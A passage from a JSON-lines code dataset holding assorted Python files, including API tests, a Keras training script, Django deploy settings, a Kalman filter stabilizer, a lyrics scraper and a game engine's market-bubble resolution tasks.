test_robot_token_edit(\n pgsql,\n taxi_cargo_corp,\n is_robot_exist,\n is_robot_enabled,\n expected_code,\n):\n if is_robot_exist:\n utils.create_employee(\n pgsql,\n corp_client_id=utils.CORP_CLIENT_ID,\n is_disabled=is_robot_enabled,\n is_robot=True,\n )\n\n for _ in range(2):\n body = {'revision': 1, 'is_enabled': is_robot_enabled}\n response = await taxi_cargo_corp.post(\n 'v1/client/robot/token/edit',\n headers={\n 'X-B2B-Client-Id': utils.CORP_CLIENT_ID,\n 'X-Yandex-Uid': utils.YANDEX_UID,\n },\n json=body,\n )\n assert response.status_code == expected_code\n if expected_code == 200:\n assert response.json() == {\n 'revision': 2,\n 'is_enabled': is_robot_enabled,\n }\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_cargo_corp/test_robot_token.py","file_name":"test_robot_token.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72686525969","text":"import time\n\nimport pytest\nfrom fastapi.testclient import TestClient\n\n\nclass TestBlog:\n USER = {\n \"username\": f\"testuser{int(time.time())}\",\n \"password\": \"testpassword\"\n }\n USER_EMPLOYEE = {\n \"username\": f\"testuser_employee{int(time.time())}\",\n \"password\": \"testpassword_employee\"\n }\n\n def get_auth_client(self, client: TestClient) -> TestClient:\n response = client.post(\"/auth/login/\", json=self.USER)\n access_token = response.json()[\"access_token\"]\n return TestClient(\n client.app, headers={\"Authorization\": f\"Bearer {access_token}\"}\n )\n\n def get_auth_client_employee(self, client: TestClient) -> TestClient:\n response = client.post(\"/auth/login/\", json=self.USER_EMPLOYEE)\n access_token = response.json()[\"access_token\"]\n return TestClient(\n client.app, headers={\"Authorization\": f\"Bearer {access_token}\"}\n )\n\n def test_register(self, client: TestClient, session):\n for user in [self.USER, self.USER_EMPLOYEE]:\n response = client.post(\"/auth/register/\", json=user)\n assert response.status_code == 201\n assert response.json()[\"username\"] == user.get(\"username\")\n\n def test_login(self, client: TestClient) -> TestClient:\n response = client.post(\"/auth/login/\", json=self.USER_EMPLOYEE)\n assert response.status_code == 200\n assert \"access_token\" in response.json()\n assert response.json()[\"token_type\"] == \"Bearer\"\n\n def test_get_staff(self, client: TestClient, 
session):\n code = {\"code\": \"надо\"}\n response = self.get_auth_client(client).patch(\n \"/auth/users/get-staff-status/\", json=code\n )\n assert response.status_code == 200\n assert response.json()[\"Status Staff\"] is True\n\n @pytest.mark.parametrize(\"skip, limit\", [(0, 20), (0, 1)])\n def test_read_users(self, client: TestClient, session, skip, limit):\n response = self.get_auth_client(client).get(\n f\"/auth/users/?skip={skip}&limit={limit}\"\n )\n assert response.status_code == 200\n users = response.json()\n assert len(users) <= limit\n\n def test_read_user(self, client: TestClient, session):\n response = self.get_auth_client(client).get(\"/auth/users/me/\")\n assert response.status_code == 200\n response = client.get(\"/auth/users/me/\")\n assert response.status_code == 401\n\n def test_set_rate(self, client: TestClient, session):\n salary = {\n \"employee_id\": 2,\n \"current_rate\": 50000,\n \"rate_increase_period\": 90\n }\n response = self.get_auth_client(client).post(\n \"/salary/set-rate/\", json=salary\n )\n assert response.status_code == 201\n assert float(response.json()['current_rate'])\n assert response.json()['current_rate'] == 50000.0\n assert response.json()['employee_id'] == 2\n\n response = client.post(\n \"/salary/set-rate/\", json=salary\n )\n assert response.status_code == 401\n\n def test_next_pay_raise(self, client: TestClient, session):\n response = self.get_auth_client_employee(client).get(\n \"/next-pay-raise\"\n )\n assert response.status_code == 404\n","repo_name":"exp-ext/current_paychecks","sub_path":"backend/tests/test_ruoters.py","file_name":"test_ruoters.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16913742449","text":"\n# CTRL+K then CTRL+C adds the # in VS for selected lines. CTRL+K then CTRL+U removes the # in VS for selected lines.\n\n# sys.path is a built-in variable within the sys module. It contains a list of directories that the interpreter will search in for the required module. 
\n\n#When a module(a module is a python file) is imported within a Python file,\n#the interpreter first searches for the specified module among its built-in modules.\n#If not found it looks through the list of directories(a directory is a folder that contains related modules) defined by sys.path.\n#first string returned by path is always empty this is to indicate the interpreter to check in the current directory.\n\n# from src.utils.common_utils import read_config\n# from src.utils.data_management import get_data\n# from src.utils.model import create_model, save_model ,save_plot\n# from src.utils.callbacks import get_callbacks\n\nfrom utils.common_utils import read_config\nfrom utils.data_management import get_data\nfrom utils.model import create_model, save_model ,save_plot\nfrom utils.callbacks import get_callbacks\n\nimport os\nimport argparse \n\ndef training(config_path):\n config = read_config(config_path)\n\n validation_datasize = config [\"params\"][\"validation_datasize\"]\n (X_train, y_train),(X_valid, y_valid), (X_test, y_test)= get_data(validation_datasize)\n\n #print(config)\n\n LOSS_FUNCTION= config [\"params\"][\"loss_function\"]\n OPTIMIZER= config [\"params\"][\"optimizer\"]\n METRICS= config [\"params\"][\"metrices\"]\n NUM_CLASSES=config [\"params\"][\"no_classes\"]\n\n model= create_model(LOSS_FUNCTION,OPTIMIZER,METRICS,NUM_CLASSES)\n\n EPOCHS = config [\"params\"][\"epochs\"]\n VALIDATION_SET = (X_valid, y_valid)\n\n CALLBACK_LIST = get_callbacks(config,X_train);\n\n\n history = model.fit(X_train, y_train, epochs=EPOCHS,\n validation_data=VALIDATION_SET,callbacks=CALLBACK_LIST)\n\n artifacts_dir = config[\"artifacts\"][\"artifacts_dir\"]\n model_name = config[\"artifacts\"][\"model_name\"]\n model_dir = config[\"artifacts\"][\"model_dir\"]\n\n model_dir_path=os.path.join(artifacts_dir,model_dir)\n os.makedirs(model_dir_path,exist_ok=True)\n\n save_model(model, model_name, model_dir_path)\n\n plots_dir = config[\"artifacts\"][\"plots_dir\"]\n plots_dir_path = os.path.join(artifacts_dir, plots_dir)\n os.makedirs(plots_dir_path, exist_ok=True)\n\n plots_name = config[\"artifacts\"][\"plots_name\"]\n loss_acc = history.history\n save_plot(loss_acc,plots_name,plots_dir_path)\n\nif __name__ == '__main__':\n\n args=argparse.ArgumentParser()\n\n args.add_argument('-c', '--config',default=\"config.yaml\")\n\n # default– value produced if the arguments are absent from the command line\n\n parsed_args = args.parse_args()\n\n #The benefit of using argparse is that if I have one more another configuration file also and I have to experiment\n #whether it will work or not, and we donot have to change anything in original configuration file.\n #We just need pass it as argument in the CLI .\n #For eg: Suppose if we have one more configuration file config2.yaml and secrets_custom.yaml\n #in CLI we will pass\n #python src/training.py -config=config2.yaml -secret=secrets_custom.yaml\n #OR\n #python src/training.py -c=config2.yaml -s=secrets_custom.yaml\n #If I donot pass any arguments. 
For example:\n #python src/training.py\n #default value is taken as argument\n\n training(config_path=parsed_args.config)# to get the value of config we write parsed_args.config\n\n #args.add_argument('-s', '--secret',default=\"secrets.yaml\")\n #training(config_path=parsed_args.secret)","repo_name":"arjunaju123/ANN_implementation_Python_scripting","sub_path":"src/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":3620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37715114327","text":"from .base import *\n\ndef read_secret(secret_name):\n file = open('/run/secrets/' + secret_name)\n secret = file.read()\n secret = secret.rstrip().lstrip()\n file.close()\n\n return secret\n\n\nenv = environ.Env( # secret key를 위한 설정!!\n # set casting, default value\n DEBUG=(bool, False)\n)\n\n# reading .env file\nenviron.Env.read_env(\n env_file= os.path.join(BASE_DIR, '.env') # secret key를 위한 설정!!\n)\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = read_secret('DJANGO_SECRET_KEY')\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False # 배포할때는 false여야 수정이 불가능함!!\n\nALLOWED_HOSTS = ['*']\n\n\n\n# Database\n# https://docs.djangoproject.com/en/3.1/ref/settings/#databases\n\nDATABASES = { # 위의 링크로 들어가서 아래내용 복사하고 붙여넣기!!\n 'default': {\n 'ENGINE': 'django.db.backends.mysql', # mysql을 쓰는 이유는 mariadb는 mysql의 분기된 db임 그래서 거의 같다고 보면됨!!\n 'NAME': 'django', # 연결하는 mariadb 안에서 db를 만들것이다. 그 만든 db의 이름이 어떻게 될것인지 설정하는 것이다.\n 'USER': 'django', # 유저이름 설정인듯\n 'PASSWORD': read_secret('MYSQL_PASSWORD'), # 비번설정\n 'HOST': 'mariadb', # 연결된 컨테이너끼리는 container의 이름을 통해 통신하기때문에 mariadb라는 컨테이너를 만들었으니 이름을 적어주면 연결됨!!\n 'PORT': '3306', # 연결된 컨테이너끼리는 이름으로 연결이가능!! 
127.0.0.1:8000 <= 이 형식이 아니라 도메인형식으로 연결 할수 있게 된다!!\n } # 마리아db, mysql 은 3306번 포트를 사용함!!\n}\n","repo_name":"choijinan/pragmatic","sub_path":"pragmatic/settings/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"7749057707","text":"\"\"\"\nUsing Kalman Filter as a point stabilizer to stabiliz a 2D point.\n\"\"\"\nimport numpy as np\nimport cv2\n\n\nclass Stabilizer:\n \"\"\"Using Kalman filter as a point stabilizer.\"\"\"\n\n def __init__(self,\n state_num=4,\n measure_num=2,\n cov_process=0.0001,\n cov_measure=0.1):\n \"\"\"Initialization\"\"\"\n # Currently we only support scalar and point, so check user input first.\n assert state_num == 4 or state_num == 2, \"Only scalar and point supported, Check state_num please.\"\n\n # Store the parameters.\n self.state_num = state_num\n self.measure_num = measure_num\n\n # The filter itself.\n self.filter = cv2.KalmanFilter(state_num, measure_num, 0)\n\n # Store the state.\n self.state = np.zeros((state_num, 1), dtype=np.float32)\n\n # Store the measurement result.\n self.measurement = np.array((measure_num, 1), np.float32)\n\n # Store the prediction.\n self.prediction = np.zeros((state_num, 1), np.float32)\n\n # Kalman parameters setup for scalar.\n if self.measure_num == 1:\n self.filter.transitionMatrix = np.array([[1, 1],\n [0, 1]], np.float32)\n\n self.filter.measurementMatrix = np.array([[1, 1]], np.float32)\n\n self.filter.processNoiseCov = np.array([[1, 0],\n [0, 1]], np.float32) * cov_process\n\n self.filter.measurementNoiseCov = np.array(\n [[1]], np.float32) * cov_measure\n\n # Kalman parameters setup for point.\n if self.measure_num == 2:\n self.filter.transitionMatrix = np.array([[1, 0, 1, 0],\n [0, 1, 0, 1],\n [0, 0, 1, 0],\n [0, 0, 0, 1]], np.float32)\n\n self.filter.measurementMatrix = np.array([[1, 0, 0, 0],\n [0, 1, 0, 0]], np.float32)\n\n self.filter.processNoiseCov = np.array([[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]], np.float32) * cov_process\n\n self.filter.measurementNoiseCov = np.array([[1, 0],\n [0, 1]], np.float32) * cov_measure\n\n def update(self, measurement):\n \"\"\"Update the filter\"\"\"\n # Make kalman prediction\n self.prediction = self.filter.predict()\n\n # Get new measurement\n if self.measure_num == 1:\n self.measurement = np.array([[np.float32(measurement[0])]])\n else:\n self.measurement = np.array([[np.float32(measurement[0])],\n [np.float32(measurement[1])]])\n\n # Correct according to mesurement\n self.filter.correct(self.measurement)\n\n # Update state value.\n self.state = self.filter.statePost\n\n def set_q_r(self, cov_process=0.1, cov_measure=0.001):\n \"\"\"Set new value for processNoiseCov and measurementNoiseCov.\"\"\"\n if self.measure_num == 1:\n self.filter.processNoiseCov = np.array([[1, 0],\n [0, 1]], np.float32) * cov_process\n self.filter.measurementNoiseCov = np.array(\n [[1]], np.float32) * cov_measure\n else:\n self.filter.processNoiseCov = np.array([[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]], np.float32) * cov_process\n self.filter.measurementNoiseCov = np.array([[1, 0],\n [0, 1]], np.float32) * cov_measure","repo_name":"kwea123/VTuber_Unity","sub_path":"head_pose_estimation/stabilizer.py","file_name":"stabilizer.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","stars":751,"dataset":"github-code","pt":"66"} +{"seq_id":"70531796050","text":"from PIL import Image, 
ImageChops\nfrom resizeimage import resizeimage\nimport numpy as np\n\ndef trim(im):\n bg = Image.new(im.mode, im.size, im.getpixel((0,0)))\n diff = ImageChops.difference(im, bg)\n diff = ImageChops.add(diff, diff, 2.0, -100)\n bbox = diff.getbbox()\n if bbox:\n return im.crop(bbox)\n\nimg = Image.open(\"../media/img011-00011.png\")\ngray = img.convert('L')\nbw = gray.point(lambda x: 255 if x<128 else 0, '1')\ncropp = trim(bw)\nimg_resize = resizeimage.resize_cover(cropp, [28, 28])\nimg_resize.save(\"../media/preprocessing_data/result_bw.png\")\n\n","repo_name":"brajchit/ai_ocr","sub_path":"hello/preprocessing/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"15503714459","text":"class Solution(object):\n def sortEvenOdd(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n even, odd, final = [], [], []\n \n for i in range(len(nums)):\n if i % 2 != 0:\n odd.append(nums[i])\n else:\n even.append(nums[i])\n \n even.sort()\n odd.sort(reverse=True)\n minlen = min(len(even), len(odd))\n for i in range(minlen):\n final.append(even[i])\n final.append(odd[i])\n if len(even) == minlen:\n final += odd[minlen:]\n else:\n final += even[minlen:]\n return final\n ","repo_name":"husainridwan/leetcode-solutions","sub_path":"2164-sort-even-and-odd-indices-independently/2164-sort-even-and-odd-indices-independently.py","file_name":"2164-sort-even-and-odd-indices-independently.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"11623819866","text":"import os\n\nimport oneAsc2kml\n\ndef asc2kml(ascfilesdir):\n ascfilesList = os.listdir(ascfilesdir)\n\n for ascfile in ascfilesList: \n if os.path.splitext(ascfile)[1] == \".ASC\":\n bestgnsspos_asc_dir = ascfilesdir + \"/\" + ascfile \n oneAsc2kml.oneAsc2kml(bestgnsspos_asc_dir)\n\n#test...\n# folder of bestgnsspos.asc\n# ascfilesdir = \"/home/slam/EcarxTools_202102/asc2kml\"\n# asc2kml(ascfilesdir)","repo_name":"AaronWangmin/asc2kml","sub_path":"asc2kml/asc2kml.py","file_name":"asc2kml.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19373120753","text":"# pip install gensim\n# pip install janome\n\nfrom lib2to3.pgen2 import token\nfrom urllib import request\nimport requests\nfrom bs4 import BeautifulSoup\nfrom janome.tokenizer import Tokenizer\nfrom gensim.models import word2vec\nimport time\nimport re\n\nstarttime = time.time()\n\ndef tokenize(text, t = Tokenizer()):\n tokens = t.tokenize(text)\n word = []\n stop_word = create_stop_word()\n for token in tokens:\n part_of_speech = token.part_of_speech.split(\",\")[0]\n if part_of_speech in ['名詞', '動詞', '形容詞', '形容動詞'] and token.base_form not in stop_word:\n word.append(token.base_form)\n\n return word\n\ndef create_stop_word():\n target_url = \"http://svn.sourceforge.jp/svnroot/slothlib/CSharp/Version1/SlothLib/NLP/Filter/StopWord/word/Japanese.txt\"\n r = requests.get(target_url)\n soup = BeautifulSoup(r.text, \"html.parser\")\n stop_word = str(soup).split()\n\n stop_word.extend([i for i in \"あいうえおかきくけこさしすせそたちつてとなにぬねのはひふへほまみむめもやゆよらりるれろわをん\"])\n stop_word.extend([\"れる\", \"なる\", \"ひる\", \"つて\", \"てる\"])\n\n return stop_word\n\nbase_url = \"https://www.uta-net.com/\"\nresult_search_url = 
\"https://www.uta-net.com/search/?target=art&type=in&Keyword=%E6%A4%8E%E5%90%8D%E6%9E%97%E6%AA%8E\"\n\nres = requests.get(result_search_url)\nsoup = BeautifulSoup(res.text, \"html.parser\")\n\nsinger_list = [h.get(\"href\") for h in soup.find_all(\"a\", attrs={\"class\": \"d-block\"})]\nsinger_list.extend([\"/artist/3484/\"])\n\nkashi_list = []\nfor u in singer_list:\n res = requests.get(base_url + u)\n soup = BeautifulSoup(res.text, \"html.parser\")\n\n for song in soup.find_all(\"span\", attrs={\"class\": \"d-block d-lg-none utaidashi text-truncate\"}):\n kashi = song.string.replace(\"\\u3000\", \" \")\n \n # 英数字の削除\n kashi = re.sub(\"[a-zA-Z0-9_]\",\"\",kashi)\n # 記号の削除\n kashi = re.sub(\"[!-/:-@[-`{-~]\",\"\",kashi)\n # 空白・改行の削除\n kashi = re.sub(u'\\n\\n', '\\n', kashi)\n kashi = re.sub(u'\\r', '', kashi)\n\n kashi = kashi.strip()\n kashi_list.append(kashi)\n\nprint('len :', len(kashi_list))\nsentence = [tokenize(i) for i in kashi_list]\n\nmodel = word2vec.Word2Vec(sentence, min_count=4, window=15)\nfor i in model.wv.most_similar(positive=[\"人生\"], topn=40):\n # 長い単語を出したい時は下の行をコメント解除してtopn=200くらいにした\n # if len(i[0]) > 2:\n print(round(i[1], 8), i[0])\n\nprint('time :', time.time() - starttime)","repo_name":"teraos/MorphologicalAnalysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41921324834","text":"'''\nEscreva um programa que leia dois números e compare-os, mostrando na tela uma mensagem:\n- O primeiro valor é o maior.\n- O segundo valor é o maior.\n- Não existe nenhum valor, os dois são iguais.\n'''\n# DICIONÁRIO DE CORES\ncores = {'limpa': '\\033[m',\n 'amarelo': '\\033[33m'\n }\n\nprint('{}****** SISTEMA DE COMPARAÇÃO ******{}'.format(cores['amarelo'], cores['limpa']))\n\nn1 = float(input('Insira o primeiro número: '))\nn2 = float(input('Insira o segundo número: '))\n\nif n1 < n2:\n print('O número {} é maior que o número {}.'.format(n2, n1))\nelif n1 > n2:\n print('O número {} é maior que o número {}.'.format(n1, n2))\nelse:\n print('Os números são iguais!')\n\nprint('********* FIM DA EXECUÇÃO DO PROGRAMA! 
*********')\n","repo_name":"frederico-prog/python","sub_path":"cursoemvideo/Atividades/exercicios/ex038.py","file_name":"ex038.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"13617714748","text":"print(f'{\" Challenge 101 \":=^99}')\n# Create a program that has a function called vote() that will receive as a parameter the year of birth of a person,\n# returning a literal value indicating whether a person has a DENIED, OPTIONAL and MANDATORY vote in the elections.\nprint('>>> Voting program ')\nprint(\"INSTRUCTIONS:\\nEnter the data and the program will return the person's condition regarding the next elections.\")\nprint('-' * 99)\n\n\ndef vote(birth):\n\tfrom datetime import date\n\tcurrent = date.today().year\n\tage = current - birth\n\tif age < 16:\n\t\treturn f\"> This voter does not vote.\"\n\telif 16 <= age < 18 or age >= 65:\n\t\treturn f'> This voter has optional vote.'\n\telse:\n\t\treturn f'> This voter has a mandatory vote.'\n\n\nyear = int(input('Year of birth: '))\nprint(vote(year))\n\nprint('=' * 99)\n","repo_name":"andre7582/Python-Projects","sub_path":"cursoemvideo/desafio_101.py","file_name":"desafio_101.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"374559565","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# https://docs.scrapy.org/en/latest/topics/items.html\n#\n# Author: react117 \n# Email: avikbhattacharyya.2k@gmail.com, avik@ai4bharat.org\n\nimport scrapy\n\n\nclass UrlExtractorItem(scrapy.Item):\n # The source URL\n url_from = scrapy.Field()\n\n # The destination URL\n url_to = scrapy.Field()\n ","repo_name":"react117/url_extractor","sub_path":"url_extractor/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1958937293","text":"from os import path\nfrom setuptools import setup, find_packages\n\n\ndef get_readme():\n here = path.abspath(path.dirname(__file__))\n with open(path.join(here, 'README.md'), encoding='utf-8') as readme_file:\n readme = readme_file.read()\n return readme\n\n\ndef get_requirements():\n here = path.abspath(path.dirname(__file__))\n with open(path.join(here, 'requirements.txt'), encoding='utf-8') as \\\n requirements_file:\n requirements = requirements_file.read().splitlines()\n return requirements\n\n\nsetup(\n name='virtual-modi',\n version='0.3.1',\n author='Jinsung Ha',\n author_email='jsung5381@naver.com',\n description=(\n 'Implementation of virtual MODI modules written in Python.'\n ),\n long_description=get_readme(),\n long_description_content_type='text/markdown',\n license='MIT',\n install_requires=get_requirements(),\n url='https://github.com/LUXROBO/virtual-modi',\n packages=find_packages(),\n classifiers=[\n 'Programming Language :: Python :: 3',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent'\n ],\n)\n","repo_name":"LUXROBO/virtual-modi","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"576597439","text":"exit_falg = False\n#外层循环\nfor i in range(0, 5):\n #内存循环\n for j in range(0, 3):\n print(\"i的值是:%d j的值是:%d\" %(i, j))\n if j == 1:\n exit_falg = 
True\n #调出外层循环\n break\n #如果exit_flag为True,跳出外层循环\n if exit_falg:\n break","repo_name":"ChenFu0420/leranpython","sub_path":"4parts/break_out.py","file_name":"break_out.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28264215991","text":"# -*- coding: utf-8 -*-\nfrom django.db.models import Max\n\nfrom engine.tasks import ResolutionTask\nfrom engine_modules.market.models import Market, CorporationMarket\n\n\nclass AbstractBubblesTask(ResolutionTask):\n\t\"\"\"\n\tThis is an abstract class for the updating of Bubbles, it should be inherited from, but not used\n\t\"\"\"\n\n\tdef run(self, game):\n\n\t\t# We can force the use of bubbles using the force_bubbles flag\n\t\tif game.disable_side_effects and not hasattr(game, 'force_bubbles'):\n\t\t\treturn\n\n\t\t# This uses an underlying assumption: that a CorporationMarket with a value at 0 is NOT eligible to a domination bubble,\n\t\t# even if other Corporations were to have even lower assets on this Market.\n\t\t# It means '0' CANNOT be a superposed state for 'bubble_value', so we don't need 2 fields (for positive and negative bubbles)\n\n\t\t# We let negative bubbles on corporations crashed this turn\n\n\t\t# Now get all positive bubbles. We annotate the CorporationMarkets with the field 'maxval', containing the maximal value across all\n\t\tpositive_bubbles = {}\n\t\tmax_vals = {}\n\t\tfor market in Market.objects.all():\n\t\t\t# A crashed corporation does not compete for positive bubble\n\t\t\tmax_vals[market.name] = CorporationMarket.objects.filter(corporation__game=game, corporation__crash_turn__isnull=True, turn=game.current_turn, market=market).exclude(value__lte=0).aggregate(maximum=Max('value'))['maximum']\n\t\t\tif max_vals[market.name] is not None:\n\t\t\t\ttry:\n\t\t\t\t\t# A crashed corporation does not compete for positive bubble\n\t\t\t\t\tpositive_bubbles[market.name] = CorporationMarket.objects.get(corporation__game=game, corporation__crash_turn__isnull=True, turn=game.current_turn, market=market, value=max_vals[market.name])\n\t\t\t\texcept:\n\t\t\t\t\t# There were several corporations tied for first\n\t\t\t\t\tpass\n\t\tprevious_positive_bubbles = list(CorporationMarket.objects.filter(corporation__game=game, turn=game.current_turn, bubble_value=1))\n\n\t\t# We find the positive bubbles that will stay\n\t\tcommon_old_and_new_positive_bubble = []\n\t\tfor pb in positive_bubbles.values():\n\t\t\tfor ppb in previous_positive_bubbles:\n\t\t\t\tif (ppb.corporation == pb.corporation) and (ppb.market == pb.market):\n\t\t\t\t\t# We add the key\n\t\t\t\t\tcommon_old_and_new_positive_bubble.append(\"%s%s\" % (pb.corporation, pb.market))\n\n\t\t# We remove the old positive bubble\n\t\tfor ppb in previous_positive_bubbles:\n\t\t\tif ppb.value <= 0 or \"%s%s\" % (ppb.corporation, ppb.market) not in common_old_and_new_positive_bubble:\n\t\t\t\tppb.update_bubble(CorporationMarket.NO_BUBBLE)\n\n\t\tprevious_negative_bubbles = list(CorporationMarket.objects.filter(corporation__game=game, turn=game.current_turn, bubble_value=-1))\n\t\tnegative_bubbles = list(CorporationMarket.objects.filter(corporation__game=game, turn=game.current_turn, value__lte=0))\n\t\t\n\t\t# We still have to handle the previous negative bubbles\n\t\tfor pnb in previous_negative_bubbles:\n\t\t\tif pnb.value > 0:\n\t\t\t\t# We handled the other cases in the negative_bubbles loop or we will handle it in the positive_bubble 
loop\n\t\t\t\tpnb.update_bubble(CorporationMarket.NO_BUBBLE)\n\n\t\t# We add negative bubbles on corporation which doesn't already have one\n\t\tfor nb in negative_bubbles:\n\t\t\tif nb.bubble_value != CorporationMarket.NEGATIVE_BUBBLE:\n\t\t\t\tnb.update_bubble(CorporationMarket.NEGATIVE_BUBBLE)\n\n\t\t# We add the new postitive bubbles if it's a new bubble and if this market doesn't have a negative bubble\n\t\tfor pb in positive_bubbles.values():\n\t\t\tif pb.value > 0 and \"%s%s\" % (pb.corporation, pb.market) not in common_old_and_new_positive_bubble:\n\t\t\t\tpb.update_bubble(CorporationMarket.DOMINATION_BUBBLE)\n\n\nclass UpdateBubblesAfterEffectsTask(AbstractBubblesTask):\n\t\"\"\"\n\tUpdate the bubble value on the CorporationMarket objects after the First/Last effects have been applied\n\t\"\"\"\n\tRESOLUTION_ORDER = 900\n\n\tdef run(self, game):\n\n\t\tif not hasattr(game, 'disable_bubble_reevaluation'):\n\t\t\tsuper(UpdateBubblesAfterEffectsTask, self).run(game)\n\t\treturn\n\n\nclass UpdateBubblesAfterCrashTask(AbstractBubblesTask):\n\t\"\"\"\n\tUpdate the bubble value on the CorporationMarket objects after the Crash effects have been applied\n\t\"\"\"\n\t# Be careful: this task must be resolved before ReplicateCorporationMarketTask\n\tRESOLUTION_ORDER = 1100\n\n\tdef run(self, game):\n\n\t\tif not hasattr(game, 'disable_bubble_reevaluation'):\n\t\t\tsuper(UpdateBubblesAfterCrashTask, self).run(game)\n\n\t\t# We build the logs. We need to calculate the difference bewtween the end on last turn and now to create events\n\t\t# We don't do it in AbstractBubblesTask because we don't want to sent the temporaty states.\n\n\t\t# We let negative bubbles on corporations crashed this turn\n\t\tnegative_bubbles = list(CorporationMarket.objects.filter(corporation__game=game, turn=game.current_turn, bubble_value=-1))\n\t\tprevious_negative_bubbles = list(CorporationMarket.objects.filter(corporation__game=game, turn=game.current_turn - 1, bubble_value=-1))\n\t\tpositive_bubbles = list(CorporationMarket.objects.filter(corporation__game=game, turn=game.current_turn, bubble_value=1))\n\t\tprevious_positive_bubbles = list(CorporationMarket.objects.filter(corporation__game=game, turn=game.current_turn - 1, bubble_value=1))\n\n\t\tfor nb in negative_bubbles:\n\t\t\tfor pnb in previous_negative_bubbles:\n\t\t\t\tif (pnb.corporation == nb.corporation) and (pnb.market == nb.market):\n\t\t\t\t\t# This is not a new bubble\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tgame.add_event(event_type=game.GAIN_NEGATIVE_BUBBLE, data={\"market\": nb.market.name, \"corporation\": nb.corporation.base_corporation.name}, delta=-1, corporation=nb.corporation)\n\n\t\tfor pnb in previous_negative_bubbles:\n\t\t\tfor nb in negative_bubbles:\n\t\t\t\tif (pnb.corporation == nb.corporation) and (pnb.market == nb.market):\n\t\t\t\t\t# This is not a new bubble\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tgame.add_event(event_type=game.LOSE_NEGATIVE_BUBBLE, data={\"market\": pnb.market.name, \"corporation\": pnb.corporation.base_corporation.name}, delta=1, corporation=pnb.corporation)\n\n\t\tfor pb in positive_bubbles:\n\t\t\tfor ppb in previous_positive_bubbles:\n\t\t\t\tif (ppb.corporation == pb.corporation) and (ppb.market == pb.market):\n\t\t\t\t\t# This is not a new bubble\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tgame.add_event(event_type=game.GAIN_DOMINATION_BUBBLE, data={\"market\": pb.market.name, \"corporation\": pb.corporation.base_corporation.name}, delta=1, corporation=pb.corporation)\n\n\t\tfor ppb in 
previous_positive_bubbles:\n\t\t\tfor pb in positive_bubbles:\n\t\t\t\tif (ppb.corporation == pb.corporation) and (ppb.market == pb.market):\n\t\t\t\t\t# This is not a new bubble\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tgame.add_event(event_type=game.LOSE_DOMINATION_BUBBLE, data={\"market\": ppb.market.name, \"corporation\": ppb.corporation.base_corporation.name}, delta=-1, corporation=ppb.corporation)\n\n\t\treturn\n\n\nclass CreateBubblesAfterGameCreationTask(AbstractBubblesTask):\n\t\"\"\"\n\tUpdate the bubble value on the CorporationMarket objects after the creation of the game\n\t\"\"\"\n\t# Be careful: this task must be resolved before ReplicateCorporationMarketTask\n\tRESOLUTION_ORDER = 100\n\n\tdef run(self, game):\n\t\tif not hasattr(game, 'disable_bubble_reevaluation'):\n\t\t\tsuper(CreateBubblesAfterGameCreationTask, self).run(game)\n\n\nclass ReplicateCorporationMarketsTask(ResolutionTask):\n\t\"\"\"\n\tCopy the CorporationMarket objects from current turn for next turn\n\t\"\"\"\n\tRESOLUTION_ORDER = 1200\n\t\n\tdef run(self, game):\n\n\t\t# On next turn, these will stand for the beginning values\n\t\tcorporation_markets = CorporationMarket.objects.filter(corporation__game=game, corporation__crash_turn__isnull=True, turn=game.current_turn)\n\t\tnew_corporation_markets = []\n\t\tfor corporation_market in corporation_markets:\n\t\t\tnew_corporation_market = 